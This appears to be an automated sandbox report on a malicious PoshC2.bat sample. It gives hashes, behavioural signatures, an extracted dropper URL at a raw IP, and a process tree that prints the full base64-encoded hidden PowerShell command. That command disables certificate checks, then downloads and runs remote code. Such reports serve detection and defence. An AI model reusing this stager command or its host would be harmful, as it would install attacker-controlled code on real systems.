Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
20/09/2022, 10:10
Static task
static1
Behavioral task
behavioral1
Sample
PoshC2.bat
Resource
win7-20220812-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
PoshC2.bat
Resource
win10v2004-20220812-en
4 signatures
150 seconds
General
-
Target
PoshC2.bat
-
Size
788B
-
MD5
96f8a516919536f8f3da32bc5eb58bda
-
SHA1
7e13fa91b8085fa48269475e413c22e55716f59e
-
SHA256
56b823c64968f9eb87a57b688e569eb7040501f291be4606cb226ff281eaffb4
-
SHA512
464ddfec07671b295ee3dcfe44c48c428fde6f6c02548a3d9ede77c5f1e7d59c23b018faaf5bfc1eb1f10aa34674a3c329529d585b84b08e30d397c72c76dbc3
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://95.213.145.101/uasclient/0.1.34/modules/_rp
Signatures
-
Blocklisted process makes network request 26 IoCs
flow pid Process 3 1984 powershell.exe 5 1984 powershell.exe 6 1984 powershell.exe 7 1984 powershell.exe 8 1984 powershell.exe 9 1984 powershell.exe 10 1984 powershell.exe 11 1984 powershell.exe 13 1984 powershell.exe 14 1984 powershell.exe 15 1984 powershell.exe 16 1984 powershell.exe 17 1984 powershell.exe 18 1984 powershell.exe 19 1984 powershell.exe 20 1984 powershell.exe 21 1984 powershell.exe 22 1984 powershell.exe 23 1984 powershell.exe 24 1984 powershell.exe 25 1984 powershell.exe 26 1984 powershell.exe 27 1984 powershell.exe 28 1984 powershell.exe 29 1984 powershell.exe 30 1984 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1984 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 544 wrote to memory of 1984 544 cmd.exe 27 PID 544 wrote to memory of 1984 544 cmd.exe 27 PID 544 wrote to memory of 1984 544 cmd.exe 27
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\PoshC2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AOQA1AC4AMgAxADMALgAxADQANQAuADEAMAAxAC8AdQBhAHMAYwBsAGkAZQBuAHQALwAwAC4AMQAuADMANAAvAG0AbwBkAHUAbABlAHMALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA=2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-